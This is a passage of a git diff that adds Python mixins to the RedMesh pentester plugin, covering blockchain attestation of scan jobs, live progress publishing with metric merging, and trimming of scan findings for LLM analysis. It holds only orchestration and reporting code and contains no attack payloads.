b/extensions/business/cybersec/red_mesh/mixins/attestation.py new file mode 100644 index 00000000..21e1de8a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/attestation.py @@ -0,0 +1,299 @@ +""" +Blockchain attestation mixin for RedMesh pentester API. + +Handles obfuscation of scan metadata (IPs, CIDs, execution IDs) and +submission of attestations to the Ratio1 blockchain via the bc client. +""" + +import ipaddress +from urllib.parse import urlparse + +from ..constants import RUN_MODE_SINGLEPASS, RUN_MODE_CONTINUOUS_MONITORING +from ..services.config import get_attestation_config +from ..services.resilience import run_bounded_retry + + +class _AttestationMixin: + """Blockchain attestation methods for PentesterApi01Plugin.""" + + @staticmethod + def _resolve_attestation_report_cid(workers: dict, preferred_cid=None) -> str | None: + if isinstance(preferred_cid, str) and preferred_cid.strip(): + return preferred_cid.strip() + if not isinstance(workers, dict): + return None + + report_cids = [ + worker.get("report_cid", "").strip() + for worker in workers.values() + if isinstance(worker, dict) and isinstance(worker.get("report_cid"), str) and worker.get("report_cid").strip() + ] + if len(report_cids) == 1: + return report_cids[0] + return None + + def _attestation_get_tenant_private_key(self): + private_key = get_attestation_config(self)["PRIVATE_KEY"] + if private_key: + private_key = private_key.strip() + if not private_key: + return None + return private_key + + @staticmethod + def _attestation_pack_cid_obfuscated(report_cid) -> str: + if not isinstance(report_cid, str) or len(report_cid.strip()) == 0: + return "0x" + ("00" * 10) + cid = report_cid.strip() + if len(cid) >= 10: + masked = cid[:5] + cid[-5:] + else: + masked = cid.ljust(10, "_") + safe = "".join(ch if 32 <= ord(ch) <= 126 else "_" for ch in masked)[:10] + data = safe.encode("ascii", errors="ignore") + if len(data) < 10: + data = data + (b"_" * (10 - len(data))) + return "0x" + data[:10].hex() + + @staticmethod + def _attestation_extract_host(target): + if not isinstance(target, str): + return None + target = target.strip() + if not target: + return None + if "://" in target: + parsed = urlparse(target) + if parsed.hostname: + return parsed.hostname + host = target.split("/", 1)[0] + if host.count(":") == 1 and "." in host: + host = host.split(":", 1)[0] + return host + + def _attestation_pack_ip_obfuscated(self, target) -> str: + host = self._attestation_extract_host(target) + if not host: + return "0x0000" + if ".." in host: + parts = host.split("..") + if len(parts) == 2 and all(part.isdigit() for part in parts): + first_octet = int(parts[0]) + last_octet = int(parts[1]) + if 0 <= first_octet <= 255 and 0 <= last_octet <= 255: + return f"0x{first_octet:02x}{last_octet:02x}" + try: + ip_obj = ipaddress.ip_address(host) + except Exception: + return "0x0000" + if ip_obj.version != 4: + return "0x0000" + octets = host.split(".") + first_octet = int(octets[0]) + last_octet = int(octets[-1]) + return f"0x{first_octet:02x}{last_octet:02x}" + + @staticmethod + def _attestation_pack_execution_id(job_id) -> str: + if not isinstance(job_id, str): + raise ValueError("job_id must be a string") + job_id = job_id.strip() + if len(job_id) != 8: + raise ValueError("job_id must be exactly 8 characters") + try: + data = job_id.encode("ascii") + except UnicodeEncodeError as exc: + raise ValueError("job_id must contain only ASCII characters") from exc + return "0x" + data.hex() + + def _attestation_get_worker_eth_addresses(self, workers: dict) -> list[str]: + if not isinstance(workers, dict): + return [] + eth_addresses = [] + for node_addr in workers.keys(): + eth_addr = self.bc.node_addr_to_eth_addr(node_addr) + if not isinstance(eth_addr, str) or not eth_addr.startswith("0x"): + raise ValueError(f"Unable to convert worker node to EVM address: {node_addr}") + eth_addresses.append(eth_addr) + eth_addresses.sort() + return eth_addresses + + def _attestation_pack_node_hashes(self, workers: dict) -> str: + eth_addresses = self._attestation_get_worker_eth_addresses(workers) + if len(eth_addresses) == 0: + return "0x" + ("00" * 32) + digest = self.bc.eth_hash_message(types=["address[]"], values=[eth_addresses], as_hex=True) + if isinstance(digest, str) and digest.startswith("0x"): + return digest + return "0x" + str(digest) + + def _submit_redmesh_test_attestation( + self, + job_id: str, + job_specs: dict, + workers: dict, + vulnerability_score=0, + node_ips=None, + report_cid=None, + ): + self.P(f"[ATTESTATION] Test attestation requested for job {job_id} (score={vulnerability_score})") + attestation_cfg = get_attestation_config(self) + if not attestation_cfg["ENABLED"]: + self.P("[ATTESTATION] Attestation is disabled via config. Skipping.", color='y') + return None + tenant_private_key = self._attestation_get_tenant_private_key() + if tenant_private_key is None: + self.P( + "[ATTESTATION] Tenant private key is missing. " + "Expected env var 'R1EN_ATTESTATION_PRIVATE_KEY'. Skipping.", + color='y' + ) + return None + + run_mode = str(job_specs.get("run_mode", RUN_MODE_SINGLEPASS)).upper() + test_mode = 1 if run_mode == RUN_MODE_CONTINUOUS_MONITORING else 0 + node_count = len(workers) if isinstance(workers, dict) else 0 + target = job_specs.get("target") + execution_id = self._attestation_pack_execution_id(job_id) + report_cid = self._resolve_attestation_report_cid(workers, preferred_cid=report_cid) + node_eth_address = self.bc.eth_address + ip_obfuscated = self._attestation_pack_ip_obfuscated(target) + cid_obfuscated = self._attestation_pack_cid_obfuscated(report_cid) + + self.P( + f"[ATTESTATION] Submitting test attestation: job={job_id}, mode={'CONTINUOUS' if test_mode else 'SINGLEPASS'}, " + f"nodes={node_count}, score={vulnerability_score}, target={ip_obfuscated}, " + f"cid={cid_obfuscated}, sender={node_eth_address}" + ) + retries = max(int(attestation_cfg["RETRIES"] or 1), 1) + tx_hash = run_bounded_retry( + self, + "submit_redmesh_test_attestation", + retries, + lambda: self.bc.submit_attestation( + function_name="submitRedmeshTestAttestation", + function_args=[ + test_mode, + node_count, + vulnerability_score, + execution_id, + ip_obfuscated, + cid_obfuscated, + ], + signature_types=["bytes32", "uint8", "uint16", "uint8", "bytes8", "bytes2", "bytes10"], + signature_values=[ + self.REDMESH_ATTESTATION_DOMAIN, + test_mode, + node_count, + vulnerability_score, + execution_id, + ip_obfuscated, + cid_obfuscated, + ], + tx_private_key=tenant_private_key, + ), + ) + if not tx_hash: + self.P(f"[ATTESTATION] Test attestation failed after {retries} attempts.", color='y') + return None + + # Obfuscate node IPs for attestation metadata + obfuscated_node_ips = [] + if node_ips: + for ip in node_ips: + obfuscated_node_ips.append(self._attestation_pack_ip_obfuscated(ip)) + + result = { + "job_id": job_id, + "tx_hash": tx_hash, + "test_mode": "C" if test_mode == 1 else "S", + "node_count": node_count, + "vulnerability_score": vulnerability_score, + "execution_id": execution_id, + "report_cid": report_cid, + "node_eth_address": node_eth_address, + "node_ips_obfuscated": obfuscated_node_ips, + } + self.P( + "Submitted RedMesh test attestation for " + f"{job_id} (tx: {tx_hash}, node: {node_eth_address}, score: {vulnerability_score})", + color='g' + ) + return result + + def _submit_redmesh_job_start_attestation(self, job_id: str, job_specs: dict, workers: dict): + self.P(f"[ATTESTATION] Job-start attestation requested for job {job_id}") + attestation_cfg = get_attestation_config(self) + if not attestation_cfg["ENABLED"]: + self.P("[ATTESTATION] Attestation is disabled via config. Skipping.", color='y') + return None + tenant_private_key = self._attestation_get_tenant_private_key() + if tenant_private_key is None: + self.P( + "[ATTESTATION] Tenant private key is missing. " + "Expected env var 'R1EN_ATTESTATION_PRIVATE_KEY'. Skipping.", + color='y' + ) + return None + + run_mode = str(job_specs.get("run_mode", RUN_MODE_SINGLEPASS)).upper() + test_mode = 1 if run_mode == RUN_MODE_CONTINUOUS_MONITORING else 0 + node_count = len(workers) if isinstance(workers, dict) else 0 + target = job_specs.get("target") + execution_id = self._attestation_pack_execution_id(job_id) + node_eth_address = self.bc.eth_address + ip_obfuscated = self._attestation_pack_ip_obfuscated(target) + node_hashes = self._attestation_pack_node_hashes(workers) + + worker_addrs = list(workers.keys()) if isinstance(workers, dict) else [] + self.P( + f"[ATTESTATION] Submitting job-start attestation: job={job_id}, mode={'CONTINUOUS' if test_mode else 'SINGLEPASS'}, " + f"nodes={node_count}, target={ip_obfuscated}, node_hashes={node_hashes}, " + f"workers={worker_addrs}, sender={node_eth_address}" + ) + retries = max(int(attestation_cfg["RETRIES"] or 1), 1) + tx_hash = run_bounded_retry( + self, + "submit_redmesh_job_start_attestation", + retries, + lambda: self.bc.submit_attestation( + function_name="submitRedmeshJobStartAttestation", + function_args=[ + test_mode, + node_count, + execution_id, + node_hashes, + ip_obfuscated, + ], + signature_types=["bytes32", "uint8", "uint16", "bytes8", "bytes32", "bytes2"], + signature_values=[ + self.REDMESH_ATTESTATION_DOMAIN, + test_mode, + node_count, + execution_id, + node_hashes, + ip_obfuscated, + ], + tx_private_key=tenant_private_key, + ), + ) + if not tx_hash: + self.P(f"[ATTESTATION] Job-start attestation failed after {retries} attempts.", color='y') + return None + + result = { + "job_id": job_id, + "tx_hash": tx_hash, + "test_mode": "C" if test_mode == 1 else "S", + "node_count": node_count, + "execution_id": execution_id, + "node_hashes": node_hashes, + "ip_obfuscated": ip_obfuscated, + "node_eth_address": node_eth_address, + } + self.P( + "Submitted RedMesh job-start attestation for " + f"{job_id} (tx: {tx_hash}, node: {node_eth_address}, node_count: {node_count})", + color='g' + ) + return result diff --git a/extensions/business/cybersec/red_mesh/mixins/live_progress.py b/extensions/business/cybersec/red_mesh/mixins/live_progress.py new file mode 100644 index 00000000..cdd0884c --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/live_progress.py @@ -0,0 +1,339 @@ +""" +Live progress mixin for RedMesh pentester API. + +Handles real-time scan progress publishing to the CStore `:live` hset +and merging of scan metrics across worker threads. +""" + +from ..models import WorkerProgress +from ..constants import PHASE_ORDER, GRAYBOX_PHASE_ORDER + +DEFAULT_PROGRESS_PUBLISH_INTERVAL = 30.0 + + +def _thread_phase(state): + """Determine which phase a single thread is currently in. + + Supports both network and webapp (graybox) scan types. Network + scans use the existing phase markers. Webapp scans use graybox_* + markers and map to their own phase names. + """ + tests = set(state.get("completed_tests", [])) + scan_type = state.get("scan_type") + + if scan_type == "webapp": + # Graybox phase progression: + # preflight -> authentication -> discovery -> graybox_probes -> weak_auth -> done + if "graybox_weak_auth" in tests or "graybox_probes" in tests: + return "done" + if "graybox_discovery" in tests: + return "graybox_probes" + if "graybox_auth" in tests: + return "discovery" + return "preflight" + + # Network phase progression (unchanged): + if "correlation_completed" in tests: + return "done" + if "web_tests_completed" in tests: + return "correlation" + if "service_info_completed" in tests: + return "web_tests" + if "fingerprint_completed" in tests: + return "service_probes" + return "port_scan" + + +class _LiveProgressMixin: + """Live progress tracking methods for PentesterApi01Plugin.""" + + def _get_execution_live_meta(self, job_id): + """Return cached worker-owned live metadata for an active local execution.""" + meta_map = getattr(self, "_execution_live_meta", None) + if isinstance(meta_map, dict): + meta = meta_map.get(job_id) + if isinstance(meta, dict): + return dict(meta) + return {} + + def _get_progress_publish_interval(self): + """Return a safe numeric live-progress publish interval in seconds.""" + interval = getattr(self, "_progress_publish_interval", None) + if interval is None: + interval = getattr(self, "cfg_progress_publish_interval", None) + if interval is None: + config = getattr(self, "CONFIG", None) + if isinstance(config, dict): + interval = config.get("PROGRESS_PUBLISH_INTERVAL") + try: + interval = float(interval) + except (TypeError, ValueError): + interval = DEFAULT_PROGRESS_PUBLISH_INTERVAL + if interval <= 0: + interval = DEFAULT_PROGRESS_PUBLISH_INTERVAL + return interval + + @staticmethod + def _merge_worker_metrics(metrics_list): + """Merge scan_metrics dicts from multiple local worker threads.""" + if not metrics_list: + return None + merged = {} + # Sum connection outcomes + outcomes = {} + for m in metrics_list: + for k, v in (m.get("connection_outcomes") or {}).items(): + outcomes[k] = outcomes.get(k, 0) + v + if outcomes: + merged["connection_outcomes"] = outcomes + # Sum coverage + cov_scanned = sum(m.get("coverage", {}).get("ports_scanned", 0) for m in metrics_list if m.get("coverage")) + cov_range = sum(m.get("coverage", {}).get("ports_in_range", 0) for m in metrics_list if m.get("coverage")) + cov_skipped = sum(m.get("coverage", {}).get("ports_skipped", 0) for m in metrics_list if m.get("coverage")) + cov_open = sum(m.get("coverage", {}).get("open_ports_count", 0) for m in metrics_list if m.get("coverage")) + if cov_range: + merged["coverage"] = { + "ports_in_range": cov_range, "ports_scanned": cov_scanned, + "ports_skipped": cov_skipped, + "coverage_pct": round(cov_scanned / cov_range * 100, 1), + "open_ports_count": cov_open, + } + # Sum finding distribution + findings = {} + for m in metrics_list: + for k, v in (m.get("finding_distribution") or {}).items(): + findings[k] = findings.get(k, 0) + v + if findings: + merged["finding_distribution"] = findings + # Sum service distribution + services = {} + for m in metrics_list: + for k, v in (m.get("service_distribution") or {}).items(): + services[k] = services.get(k, 0) + v + if services: + merged["service_distribution"] = services + # Sum probe counts + for field in ("probes_attempted", "probes_completed", "probes_skipped", "probes_failed"): + merged[field] = sum(m.get(field, 0) for m in metrics_list) + # Sum graybox scenario counters + for field in ( + "scenarios_total", + "scenarios_vulnerable", + "scenarios_clean", + "scenarios_inconclusive", + "scenarios_error", + ): + merged[field] = sum(m.get(field, 0) for m in metrics_list) + # Merge probe breakdown (union of all probes) + probe_bd = {} + for m in metrics_list: + for k, v in (m.get("probe_breakdown") or {}).items(): + # Keep worst status: failed > skipped > completed + existing = probe_bd.get(k) + if existing is None or v == "failed" or (v.startswith("skipped") and existing == "completed"): + probe_bd[k] = v + if probe_bd: + merged["probe_breakdown"] = probe_bd + # Total duration: max across threads/nodes (they run in parallel) + merged["total_duration"] = max(m.get("total_duration", 0) for m in metrics_list) + # Phase durations: max per phase (threads/nodes run in parallel, so wall-clock + # time for each phase is the max across all of them) + all_phases = {} + for m in metrics_list: + for phase, dur in (m.get("phase_durations") or {}).items(): + all_phases[phase] = max(all_phases.get(phase, 0), dur) + if all_phases: + merged["phase_durations"] = all_phases + longest = max(metrics_list, key=lambda m: m.get("total_duration", 0)) + # Merge stats distributions (response_times, port_scan_delays) + # Use weighted mean, global min/max, approximate p95/p99 from max of per-thread values + for stats_field in ("response_times", "port_scan_delays"): + stats_list = [m[stats_field] for m in metrics_list if m.get(stats_field)] + if stats_list: + total_count = sum(s.get("count", 0) for s in stats_list) + if total_count > 0: + merged[stats_field] = { + "min": min(s["min"] for s in stats_list), + "max": max(s["max"] for s in stats_list), + "mean": round(sum(s["mean"] * s.get("count", 1) for s in stats_list) / total_count, 4), + "median": round(sum(s["median"] * s.get("count", 1) for s in stats_list) / total_count, 4), + "stddev": round(max(s.get("stddev", 0) for s in stats_list), 4), + "p95": round(max(s.get("p95", 0) for s in stats_list), 4), + "p99": round(max(s.get("p99", 0) for s in stats_list), 4), + "count": total_count, + } + # Success rate over time: take from the longest-running thread + if longest.get("success_rate_over_time"): + merged["success_rate_over_time"] = longest["success_rate_over_time"] + # Detection flags (any thread detecting = True) + merged["rate_limiting_detected"] = any(m.get("rate_limiting_detected") for m in metrics_list) + merged["blocking_detected"] = any(m.get("blocking_detected") for m in metrics_list) + # Open port details: union, deduplicate by port + all_details = [] + seen_ports = set() + for m in metrics_list: + for d in (m.get("open_port_details") or []): + if d["port"] not in seen_ports: + seen_ports.add(d["port"]) + all_details.append(d) + if all_details: + merged["open_port_details"] = sorted(all_details, key=lambda x: x["port"]) + # Banner confirmation: sum counts + bc_confirmed = sum(m.get("banner_confirmation", {}).get("confirmed", 0) for m in metrics_list) + bc_guessed = sum(m.get("banner_confirmation", {}).get("guessed", 0) for m in metrics_list) + if bc_confirmed + bc_guessed > 0: + merged["banner_confirmation"] = {"confirmed": bc_confirmed, "guessed": bc_guessed} + return merged + + def _publish_live_progress(self): + """ + Publish live progress for all active local scan jobs. + + Builds per-thread progress data and writes a single WorkerProgress entry + per job to the `:live` CStore hset. Called periodically from process(). + + Progress is stage-based (stage_idx / 5 * 100) with port-scan sub-progress. + Phase is the earliest (least advanced) phase across all threads. + Per-thread data (phase, ports) is included when multiple threads are active. + """ + now = self.time() + publish_interval = _LiveProgressMixin._get_progress_publish_interval(self) + if now - self._last_progress_publish < publish_interval: + return + self._last_progress_publish = now + + live_hkey = f"{self.cfg_instance_id}:live" + ee_addr = self.ee_addr + + for job_id, local_workers in self.scan_jobs.items(): + if not local_workers: + continue + + # Determine phase order based on scan type (inspect first worker) + first_worker = next(iter(local_workers.values())) + if first_worker.state.get("scan_type") == "webapp": + scan_type = "webapp" + phase_order = GRAYBOX_PHASE_ORDER + else: + scan_type = "network" + phase_order = PHASE_ORDER + nr_phases = len(phase_order) + + # Build per-thread data + total_scanned = 0 + total_ports = 0 + all_open = set() + all_tests = set() + thread_entries = {} + thread_phases = [] + worker_metrics = [] + + for tid, worker in local_workers.items(): + state = worker.state + nr_ports = len(worker.initial_ports) + t_scanned = len(state.get("ports_scanned", [])) + t_open = sorted(state.get("open_ports", [])) + t_phase = _thread_phase(state) + + total_scanned += t_scanned + total_ports += nr_ports + all_open.update(t_open) + all_tests.update(state.get("completed_tests", [])) + worker_metrics.append(worker.metrics.build().to_dict()) + thread_phases.append(t_phase) + + thread_entries[tid] = { + "phase": t_phase, + "ports_scanned": t_scanned, + "ports_total": nr_ports, + "open_ports_found": t_open, + } + + # Overall phase: earliest (least advanced) across threads + phase_indices = [phase_order.index(p) if p in phase_order else nr_phases for p in thread_phases] + min_phase_idx = min(phase_indices) if phase_indices else 0 + phase = phase_order[min_phase_idx] if min_phase_idx < nr_phases else "done" + phase_index = nr_phases if phase == "done" else (min_phase_idx + 1 if phase in phase_order else 0) + + # Stage-based progress: completed_stages / total * 100 + # During port_scan, add sub-progress based on ports scanned + stage_progress = (min_phase_idx / nr_phases) * 100 + if phase == "port_scan" and total_ports > 0: + stage_progress += (total_scanned / total_ports) * (100 / nr_phases) + progress_pct = round(min(stage_progress, 100), 1) + + # Look up pass number from CStore + job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + pass_nr = 1 + assignment_revision = 1 + if isinstance(job_specs, dict): + pass_nr = job_specs.get("job_pass", 1) + worker_entry = (job_specs.get("workers") or {}).get(ee_addr) or {} + try: + assignment_revision = int(worker_entry.get("assignment_revision", 1) or 1) + except (TypeError, ValueError): + assignment_revision = 1 + + live_meta = _LiveProgressMixin._get_execution_live_meta(self, job_id) + started_at = live_meta.get("started_at", now) + first_seen_live_at = live_meta.get("first_seen_live_at", started_at) + last_seen_at = now + assignment_revision_seen = live_meta.get("assignment_revision_seen", assignment_revision) + + # Merge metrics from all local threads + merged_metrics = worker_metrics[0] if len(worker_metrics) == 1 else self._merge_worker_metrics(worker_metrics) + + progress = WorkerProgress( + job_id=job_id, + worker_addr=ee_addr, + pass_nr=pass_nr, + assignment_revision_seen=assignment_revision_seen, + progress=progress_pct, + phase=phase, + scan_type=scan_type, + phase_index=phase_index, + total_phases=nr_phases, + ports_scanned=total_scanned, + ports_total=total_ports, + open_ports_found=sorted(all_open), + completed_tests=sorted(all_tests), + updated_at=now, + started_at=started_at, + first_seen_live_at=first_seen_live_at, + last_seen_at=last_seen_at, + finished=False, + live_metrics=merged_metrics, + threads=thread_entries if len(thread_entries) > 1 else None, + ) + self.chainstore_hset( + hkey=live_hkey, + key=f"{job_id}:{ee_addr}", + value=progress.to_dict(), + ) + self.P( + "[LIVE->CSTORE] Published worker progress " + f"job_id={job_id} worker={ee_addr} pass={pass_nr} " + f"rev={assignment_revision_seen} " + f"phase={phase} progress={progress_pct}% " + f"ports={total_scanned}/{total_ports} open={len(all_open)} " + f"key={job_id}:{ee_addr}" + ) + + def _clear_live_progress(self, job_id, worker_addresses): + """ + Remove live progress keys for a completed job. + + Parameters + ---------- + job_id : str + Job identifier. + worker_addresses : list[str] + Worker addresses whose progress keys should be removed. + """ + live_hkey = f"{self.cfg_instance_id}:live" + for addr in worker_addresses: + self.chainstore_hset( + hkey=live_hkey, + key=f"{job_id}:{addr}", + value=None, # delete + ) diff --git a/extensions/business/cybersec/red_mesh/mixins/llm_agent.py b/extensions/business/cybersec/red_mesh/mixins/llm_agent.py new file mode 100644 index 00000000..94fcde3f --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/llm_agent.py @@ -0,0 +1,985 @@ +""" +LLM Agent API Mixin for RedMesh Pentester. + +This mixin provides LLM integration methods for analyzing scan results +via the RedMesh LLM Agent API (DeepSeek). + +Usage: + class PentesterApi01Plugin(_LlmAgentMixin, BasePlugin): + ... +""" + +import requests +import json +from typing import Optional + +from ..constants import RUN_MODE_SINGLEPASS +from ..services.config import get_llm_agent_config +from ..services.resilience import run_bounded_retry + +_NON_RETRYABLE_HTTP_STATUSES = {400, 401, 403, 404, 409, 410, 413, 422} +_NON_RETRYABLE_PROVIDER_STATUSES = _NON_RETRYABLE_HTTP_STATUSES +_LLM_EVIDENCE_MAX_CHARS = 240 +_LLM_BANNER_MAX_CHARS = 120 +_LLM_PAYLOAD_LIMITS = { + "security_assessment": {"services": 25, "findings": 40, "evidence_chars": 220, "open_ports": 40}, + "quick_summary": {"services": 12, "findings": 12, "evidence_chars": 140, "open_ports": 20}, + "vulnerability_summary": {"services": 20, "findings": 30, "evidence_chars": 180, "open_ports": 30}, + "remediation_plan": {"services": 18, "findings": 24, "evidence_chars": 180, "open_ports": 30}, +} +_LLM_FINDING_BUCKETS = { + "security_assessment": {"CRITICAL": 16, "HIGH": 14, "MEDIUM": 8, "LOW": 2, "INFO": 0, "UNKNOWN": 0}, + "quick_summary": {"CRITICAL": 6, "HIGH": 4, "MEDIUM": 2, "LOW": 0, "INFO": 0, "UNKNOWN": 0}, + "vulnerability_summary": {"CRITICAL": 12, "HIGH": 10, "MEDIUM": 6, "LOW": 2, "INFO": 0, "UNKNOWN": 0}, + "remediation_plan": {"CRITICAL": 10, "HIGH": 8, "MEDIUM": 4, "LOW": 2, "INFO": 0, "UNKNOWN": 0}, +} +_LLM_SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "INFO": 4, "UNKNOWN": 5} + + +class _RedMeshLlmAgentMixin(object): + """ + Mixin providing LLM Agent API integration for RedMesh plugins. + + This mixin expects the host class to have the following config attributes: + - cfg_llm_agent: dict-like nested config block, or equivalent config_data/CONFIG block + - cfg_llm_agent_api_host: str + - cfg_llm_agent_api_port: int + + And the following methods/attributes: + - self.r1fs: R1FS instance + - self.P(): logging method + - self.Pd(): debug logging method + - self._get_aggregated_report(): report aggregation method + """ + + def __init__(self, **kwargs): + super(_RedMeshLlmAgentMixin, self).__init__(**kwargs) + return + + def _get_llm_agent_config(self) -> dict: + return get_llm_agent_config(self) + + @staticmethod + def _llm_trim_text(value, max_chars): + if value is None: + return "" + text = str(value).strip() + if len(text) <= max_chars: + return text + return text[: max_chars - 3].rstrip() + "..." + + def _extract_report_findings(self, report: dict) -> list[dict]: + findings = [] + if not isinstance(report, dict): + return findings + + direct = report.get("findings") + if isinstance(direct, list): + findings.extend(item for item in direct if isinstance(item, dict)) + + correlation = report.get("correlation_findings") + if isinstance(correlation, list): + findings.extend(item for item in correlation if isinstance(item, dict)) + + service_info = report.get("service_info") + if isinstance(service_info, dict): + for service_entry in service_info.values(): + if not isinstance(service_entry, dict): + continue + nested = service_entry.get("findings") + if isinstance(nested, list): + findings.extend(item for item in nested if isinstance(item, dict)) + + web_tests = report.get("web_tests_info") + if isinstance(web_tests, dict): + for web_entry in web_tests.values(): + if not isinstance(web_entry, dict): + continue + nested = web_entry.get("findings") + if isinstance(nested, list): + findings.extend(item for item in nested if isinstance(item, dict)) + for method_entry in web_entry.values(): + if not isinstance(method_entry, dict): + continue + nested = method_entry.get("findings") + if isinstance(nested, list): + findings.extend(item for item in nested if isinstance(item, dict)) + + graybox_results = report.get("graybox_results") + if isinstance(graybox_results, dict): + for probe_map in graybox_results.values(): + if not isinstance(probe_map, dict): + continue + for probe_entry in probe_map.values(): + if not isinstance(probe_entry, dict): + continue + nested = probe_entry.get("findings") + if isinstance(nested, list): + findings.extend(item for item in nested if isinstance(item, dict)) + + return findings + + def _get_llm_payload_limits(self, analysis_type: str) -> dict: + return dict(_LLM_PAYLOAD_LIMITS.get(analysis_type, _LLM_PAYLOAD_LIMITS["security_assessment"])) + + def _estimate_llm_payload_size(self, payload: dict) -> int: + try: + return len(json.dumps(payload, sort_keys=True, default=str)) + except Exception: + return len(str(payload)) + + def _record_llm_payload_stats(self, job_id: str, analysis_type: str, raw_report: dict, shaped_payload: dict): + truncation = shaped_payload.get("truncation", {}) if isinstance(shaped_payload, dict) else {} + stats = { + "job_id": job_id, + "analysis_type": analysis_type, + "raw_bytes": self._estimate_llm_payload_size(raw_report), + "shaped_bytes": self._estimate_llm_payload_size(shaped_payload), + "truncation": truncation, + } + reduction = stats["raw_bytes"] - stats["shaped_bytes"] + stats["reduction_bytes"] = reduction + stats["reduction_ratio"] = round((reduction / stats["raw_bytes"]), 4) if stats["raw_bytes"] else 0.0 + self._last_llm_payload_stats = stats + self.Pd( + "LLM payload shaping stats for job {} [{}]: raw={}B shaped={}B reduction={}B ({:.1%}) truncation={}".format( + job_id, + analysis_type, + stats["raw_bytes"], + stats["shaped_bytes"], + reduction, + stats["reduction_ratio"], + truncation, + ) + ) + return stats + + @staticmethod + def _llm_finding_key(finding: dict) -> tuple: + return ( + str(finding.get("severity") or "").upper(), + str(finding.get("title") or "").strip().lower(), + finding.get("port"), + str(finding.get("protocol") or "").strip().lower(), + ) + + def _deduplicate_findings(self, findings: list[dict]) -> list[dict]: + deduped = [] + seen = set() + for finding in findings: + if not isinstance(finding, dict): + continue + key = self._llm_finding_key(finding) + if key in seen: + continue + seen.add(key) + deduped.append(finding) + return deduped + + def _rank_findings(self, findings: list[dict]) -> list[dict]: + def _finding_sort_key(finding): + severity = str(finding.get("severity") or "UNKNOWN").upper() + cve = 0 if (finding.get("cve_id") or finding.get("cve") or "CVE-" in str(finding.get("title") or "").upper()) else 1 + port = finding.get("port") + try: + port = int(port) + except (TypeError, ValueError): + port = 0 + return ( + _LLM_SEVERITY_ORDER.get(severity, _LLM_SEVERITY_ORDER["UNKNOWN"]), + cve, + -port, + str(finding.get("title") or ""), + ) + + return sorted(findings, key=_finding_sort_key) + + def _build_llm_metadata(self, job_id: str, target: str, scan_type: str, job_config: dict) -> dict: + metadata = { + "job_id": job_id, + "target": target, + "scan_type": scan_type, + "run_mode": job_config.get("run_mode", RUN_MODE_SINGLEPASS), + } + if scan_type == "webapp": + metadata["target_url"] = job_config.get("target_url") + metadata["excluded_features"] = list(job_config.get("excluded_features", []) or []) + metadata["app_routes_count"] = len(job_config.get("app_routes", []) or []) + else: + metadata["start_port"] = job_config.get("start_port") + metadata["end_port"] = job_config.get("end_port") + metadata["enabled_features_count"] = len(job_config.get("enabled_features", []) or []) + return metadata + + def _build_network_service_summary(self, aggregated_report: dict, analysis_type: str) -> tuple[list[dict], dict]: + services = [] + service_info = aggregated_report.get("service_info") + if not isinstance(service_info, dict): + return services, {"included_services": 0, "total_services": 0} + + limits = self._get_llm_payload_limits(analysis_type) + total_services = len(service_info) + + for raw_port, raw_entry in sorted(service_info.items(), key=lambda item: int(item[0]) if str(item[0]).isdigit() else str(item[0])): + if not isinstance(raw_entry, dict): + continue + entry = { + "port": raw_entry.get("port", raw_port), + "protocol": raw_entry.get("protocol"), + "service": raw_entry.get("service"), + "product": raw_entry.get("product") or raw_entry.get("server") or raw_entry.get("ssh_library"), + "version": raw_entry.get("version") or raw_entry.get("ssh_version"), + "banner": self._llm_trim_text(raw_entry.get("banner") or raw_entry.get("server") or "", _LLM_BANNER_MAX_CHARS), + "finding_count": len(raw_entry.get("findings") or []), + } + if raw_entry.get("findings"): + entry["top_titles"] = [ + self._llm_trim_text(finding.get("title", ""), 100) + for finding in raw_entry.get("findings", [])[:3] + if isinstance(finding, dict) and finding.get("title") + ] + services.append(entry) + if len(services) >= limits["services"]: + break + return services, {"included_services": len(services), "total_services": total_services} + + def _build_llm_top_findings(self, aggregated_report: dict, analysis_type: str) -> tuple[list[dict], dict]: + findings = self._extract_report_findings(aggregated_report) + total_findings = len(findings) + deduped = self._deduplicate_findings(findings) + ranked = self._rank_findings(deduped) + limits = self._get_llm_payload_limits(analysis_type) + bucket_limits = _LLM_FINDING_BUCKETS.get(analysis_type, _LLM_FINDING_BUCKETS["security_assessment"]) + included_by_severity = {} + compact = [] + for finding in ranked: + severity = str(finding.get("severity") or "UNKNOWN").upper() + allowed = bucket_limits.get(severity, 0) + current = included_by_severity.get(severity, 0) + if current >= allowed: + continue + compact.append({ + "severity": severity, + "title": self._llm_trim_text(finding.get("title", ""), 160), + "port": finding.get("port"), + "protocol": finding.get("protocol"), + "probe": finding.get("probe"), + "cve": finding.get("cve_id") or finding.get("cve"), + "cwe": finding.get("cwe_id"), + "owasp": finding.get("owasp_id"), + "evidence": self._llm_trim_text(finding.get("evidence", ""), limits["evidence_chars"]), + }) + included_by_severity[severity] = current + 1 + if len(compact) >= limits["findings"]: + break + return compact, { + "total_findings": total_findings, + "deduplicated_findings": len(deduped), + "included_findings": len(compact), + "included_by_severity": included_by_severity, + "truncated_findings_count": max(len(deduped) - len(compact), 0), + } + + def _build_llm_findings_summary(self, aggregated_report: dict) -> dict: + findings = self._deduplicate_findings(self._extract_report_findings(aggregated_report)) + counts = {} + for finding in findings: + severity = str(finding.get("severity") or "UNKNOWN").upper() + counts[severity] = counts.get(severity, 0) + 1 + return { + "total_findings": len(findings), + "by_severity": counts, + } + + def _build_llm_coverage_summary(self, aggregated_report: dict, analysis_type: str) -> dict: + open_ports = aggregated_report.get("open_ports") or [] + worker_activity = aggregated_report.get("worker_activity") or [] + limits = self._get_llm_payload_limits(analysis_type) + return { + "ports_scanned": aggregated_report.get("ports_scanned"), + "open_ports_count": len(open_ports), + "open_ports_sample": list(open_ports[:limits["open_ports"]]), + "workers": [ + { + "id": worker.get("id"), + "start_port": worker.get("start_port"), + "end_port": worker.get("end_port"), + "open_ports_count": len(worker.get("open_ports") or []), + } + for worker in worker_activity + if isinstance(worker, dict) + ], + } + + def _build_attack_surface_summary(self, services: list[dict], findings_summary: dict) -> dict: + exposed = [] + for service in services[:10]: + exposed.append({ + "port": service.get("port"), + "protocol": service.get("protocol"), + "service": service.get("service"), + "product": service.get("product"), + "finding_count": service.get("finding_count", 0), + }) + return { + 